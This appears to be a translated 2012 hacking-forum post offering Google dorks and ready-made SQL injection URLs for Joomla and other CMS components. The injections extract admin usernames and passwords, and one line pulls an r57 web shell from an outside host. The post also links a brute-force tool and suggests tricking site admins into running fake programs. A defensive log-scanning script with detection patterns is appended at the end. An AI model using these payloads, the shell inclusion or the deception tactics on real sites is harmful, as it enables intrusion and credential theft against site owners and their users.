Saturday, 30 June 2012

Hacking Techniques

Rainman ,
Bro, let's not judge the kid unfairly just yet.
Actually he is right in one respect: we hand out a lot of software. Try a method like this and see. If you have started reading, read from the beginning. I am going to post one or two vulnerabilities now, so don't say later that you don't teach hacking. First you approach the admin of the site you want to take down using a female nickname. OK, I was joking; anyway, moving on. Look, as you know, there are many CMS systems: WordPress, Seditio, Joomla, vBulletin, DLE, Auto 1.2, Elfchat and so on. Take Joomla, for example. Joomla is the most used method in hacking, and the same goes for WordPress. We brute-force it. How? Program download link: http://s2.dosya.tc/server16/HNJRBU/brute.zip.html
Video : http://www.youtube.com/watch?v=H4wSTlsSBvo

That was Joomla or WordPress brute force and the like. Now to our technique. What kinds of vulnerabilities does Joomla have, for example?
Modules vulnerability:

Code:
DORK : allinurl: "modules/glossaires"
EXPLOIT :
modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme
TR Script News :
Code:
Google Dork: inurl:news.php?mode=voir
Exploid: news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*
Admin login = /admin
COM ALberghi :
Code:
DORK 1 : allinurl: "" detail
DORK 2 : allinurl: "com_alberghi"
EXPLOIT 1 :
index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,con cat(username,0x3a,password)/**/from/**/jos_users/*
EXPLOIT 2 :
index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3 ,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/*
Joovideo v1.0 :
Code:
DORK 1 : allinurl: "com_joovideo" detail
DORK 2 : allinurl: "com_joovideo"
DORK 3 : Powered by joovideo V1.0
EXPLOIT :
index.php?option=com_joovideo&Itemid=S@BUN&task=de tail&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2 ,2,concat(username,0x3a,password)/**/from/**/jos_users/*
Kmita Tell Friend :
Code:
Dork: "Powered by Kmita Tell Friend" or "allinurl:/kmitat/"
Exploit: /kmitaadmin/kmitat/htmlcode.php?file=http://evilc0der.com/r57.txt?
Method: Shell
Redirects to the panel
FAQ / View FAQ vulnerability :
Code:
Dork: Google : "allinurl:viewfaqs.php?cat="
Exploit:
/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers--
Booking / Days Booking vulnerability :
Code:
Dork: "allinurl:index.php?user=daysbooking"
Exploid: index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,pa ssword,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2%20from%20admin--&user=det
pnEncyclopedia :
Code:
Dork: allinurl:index.php?module=pnEncyclopedia
Exploits (1-2)
1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11--
2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,load_file
ASPAPP KNOWLEDGEBASE :
Code:
Dork 1 - content_by_cat.asp?contentid ''catid''
Dork 2 - content_by_cat.asp? ''catid''
exploit-
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accessleve l,5,null,7,null,user_name+from+users
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accessleve l,5,null,7,8,user_name+from+users
My favorite is this Knowledge Base vulnerability.
Emagic CMS.NET 4.0 :
Code:
Dork : inurl:emc.asp?pageid=
Exploit:
emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username="'sa'--
And here is a mixed bag. Thanks to J0K3R, we found these dorks together, and we also wrote our own exploit; an exploit that works even on NOT NULL columns is in my archive. Let these be from the archive too:
Code:
DORK 1 : allinurl:"com_na_content"
DORK 2 : allinurl:"com_na_bible"
DORK 3 : allinurl:"com_na_events"
DORK 4 : allinurl:"com_na_content"
DORK 5 : allinurl:"com_na_feedback"
DORK 6 : allinurl:"com_na_mydocs"
DORK 7 : allinurl:"com_na_churchmap"
DORK 8 : allinurl:"com_na_bibleinfo"
DORK 9 : allinurl:"com_na_dbs"
DORK 10 : allinurl:"com_na_udm"
DORK 11 : allinurl:"com_na_qforms"
DORK 12 : allinurl:"com_na_gallery2"
DORK 13 : allinurl:"com_na_publicrss"
DORK 14 : allinurl:"index.php?kwd"
EXPLOIT:
index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,passwo rd%2C0%2C0%2C0/**/from/**/mos_users/*
Code:
DorK : '' webboard question.asp QID''
EXPLOIT:
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2 ,username,password,5,password,7,8,9,null%20+%20fro m%20+%20+%20administrator%20';';
Code:
Dork 1 : ''showad.php?listingid=''
Dork 2 : ''pfriendly.php?ad=''
EXPLOIT:
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0 ,1,concat(username,0x3a,email),password,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
Code:
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
Joomla vulnerabilities :
Code:
    * 2008-03-25 Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability
    * 2008-03-23 Joomla Component Cinema 1.0 Remote SQL Injection Vulnerability
    * 2008-03-23 Joomla Component d3000 1.0.0 Remote SQL Injection Vulnerability
    * 2008-03-23 Joomla Component rekry 1.0.0 (op_id) SQL Injection Vulnerability
    * 2008-03-22 Joomla Components custompages 1.1 Remote File Inclusion Vulnerability
    * 2008-03-19 Joomla Component Restaurante 1.0 (id) SQL Injection Vulnerability
    * 2008-03-19 Joomla Component Alberghi <= 2.1.3 (id) SQL Injection Vulnerability
    * 2008-03-19 Joomla Component joovideo 1.2.2 (id) SQL Injection Vulnerability
    * 2008-03-18 Joomla Component Acajoom (com_acajoom) SQL Injection Vulnerability
    * 2008-03-11 Joomla Component ProductShowcase <= 1.5 SQL Injection Vulnerability
    * 2008-03-08 Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability
    * 2008-02-23 Joomla Component simple shop 2.0 SQL Injection Vulnerability
    * 2008-02-20 Joomla Component com_hwdvideoshare SQL Injection Vulnerability
    * 2008-02-18 Joomla Component com_clasifier (cat_id) SQL Injection Vulnerability
    * 2008-02-18 Joomla Component com_pccookbook (user_id) SQL Injection Vulnerability
    * 2008-02-18 Joomla Component astatsPRO 1.0 refer.php SQL Injection Vulnerability
    * 2008-02-16 Joomla Component com_galeria Remote SQL Injection Vulnerability
    * 2008-02-16 Joomla Component jooget <= 2.6.8 Remote SQL Injection Vulnerability
    * 2008-02-14 Joomla Component mediaslide (albumnum) Blind SQL Injection Exploit
    * 2008-02-14 Joomla Component Quiz <= 0.81 (tid) SQL Injection Vulnerability
    * 2008-02-14 Joomla Component MCQuiz 0.9 Final (tid) SQL Injection Vulnerability
    * 2008-02-14 Joomla Component paxxgallery 0.2 (iid) SQL Injection Vulnerability
    * 2008-02-13 Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability
    * 2008-02-12 Joomla Component pcchess <= 0.8 Remote SQL Injection Vulnerability
    * 2008-02-12 Joomla Component rapidrecipe <= 1.6.5 SQL Injection Vulnerability
    * 2008-02-08 Joomla Component NeoGallery 1.1 SQL Injection Vulnerability
    * 2008-02-07 Joomla Component com_noticias 1.0 SQL Injection Vulnerability
    * 2008-02-07 Joomla Component com_doc Remote SQL Injection Vulnerability
    * 2008-02-06 Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability
    * 2008-02-03 Joomla Component Marketplace 1.1.1 SQL Injection Vulnerability
    * 2008-02-03 Joomla Component mosDirectory 2.3.2 (catid) SQL Injection Vulnerability
    * 2008-02-01 Joomla Component NeoReferences 1.3.1 (catid) SQL Injection Vuln
    * 2008-01-30 Joomla Component ChronoForms 2.3.5 RFI Vulnerabilities
    * 2007-12-31 Joomla Component PU Arcade <= 2.1.3 SQL Injection Vulnerability
Now you will ask why I wrote out this empty list. The reason: we search Google for the part after the date, and exploits come up from either exploit-db.com or 1337day.com. And as you can see, these were found on just one CMS, Joomla. There are even more than this for that one CMS, but I don't know whether posts have a length limit, so I included only a few. As I said, this is a single CMS. How do you look for a vulnerability on a site? You open the site, look at the very bottom, and find out which CMS it runs. Take Millikuvvetler.net, for example: if we were to hack a site like this, I would look at its CMS. On Millikuvvetler.net:
Code:
Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
Millikuvvetler.Net, Hack, Forum Hack, Msn Hack, Keylogger, Trojan, Anti Pkk, Anti Lamer
It says Powered by vBulletin version 3.8.4, so I search Google for vulnerabilities in that version. I am sure there is a vulnerability for every CMS; that is, you identify the CMS and then search Google for, say, "VBulletin v3.8.4 vulnerabilities". After that you try all the vulns that come up; one of them is bound to work. If that fails too, either move to another site or, since the biggest weakness is the site admin, talk to them and get them to run a fake program; not a keylogger, you write a nice fake program in VB. That's it. I always say: in hacking, logic always wins )))))) And one more thing: say a site has a vulnerability but this approach does not work, then I look for ways to bypass it so that it is useful for the hack. Good luck + Respect! ^_^ & Peace!
Avatar Fearless.
Topic : http://www.millikuvvetler.net/showthread.php?t=8605
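
For defenders reviewing web server logs, the request shapes listed in this post (comment-padded UNION SELECT, concat(...,0x3a,...) against a users table, mid((select ...)) probes, and a URL passed in a file parameter) can be flagged once the request target is normalized. This is an added example, not part of the original post; the rule names, the sample log lines and the paths in them are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Heuristic signatures for the request shapes quoted in the post above.
RULES = [
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("credential-concat", re.compile(r"\bconcat(?:_ws)?\s*\([^)]*0x3a")),
    ("user-table", re.compile(r"\bfrom\s+\w*(?:users|admin\w*|logins)\b")),
    ("blind-substring", re.compile(r"\bmid\s*\(\s*\(\s*select\b")),
    # Also fires on legitimate redirect parameters; treat as a lead, not proof.
    ("remote-include", re.compile(r"[?&]\w+=(?:https?|ftp)://")),
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

def normalize(target):
    """Flatten a request target: undo URL encoding and comment-as-space tricks."""
    text = target
    for _ in range(3):                      # peel up to three encoding layers
        decoded = unquote_plus(text)        # also turns '+' into a space
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text)  # /**/ used in place of spaces
    text = text.replace("/*", " ")          # unterminated trailing comment
    return re.sub(r"\s+", " ", text).lower()

def match_rules(target):
    """Return the names of all rules that match the normalized target."""
    flat = normalize(target)
    return [name for name, rx in RULES if rx.search(flat)]

def scan(lines):
    """Return (client_ip, status, rule_names) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (hits := match_rules(m.group(2))):
            # A 200 on a flagged request deserves a closer look than a 404.
            findings.append((m.group(1), int(m.group(3)), hits))
    return findings

# Constructed sample log (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jun/2012:10:00:01 +0000] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [30/Jun/2012:10:00:05 +0000] "GET /index.php?option=com_example&id=-1/**/union/**/select/**/1,concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 200 731',
    '198.51.100.7 - - [30/Jun/2012:10:00:09 +0000] "GET /list.php?cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1,2 HTTP/1.1" 200 640',
    '203.0.113.4 - - [30/Jun/2012:10:01:12 +0000] "GET /page.php?file=http://files.example/inc.txt? HTTP/1.1" 404 210',
    '192.0.2.10 - - [30/Jun/2012:10:02:00 +0000] "GET /search.php?q=credit+union HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The rules are heuristics for triage; the durable fix on the application side is parameterized queries and removing or updating the affected components.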
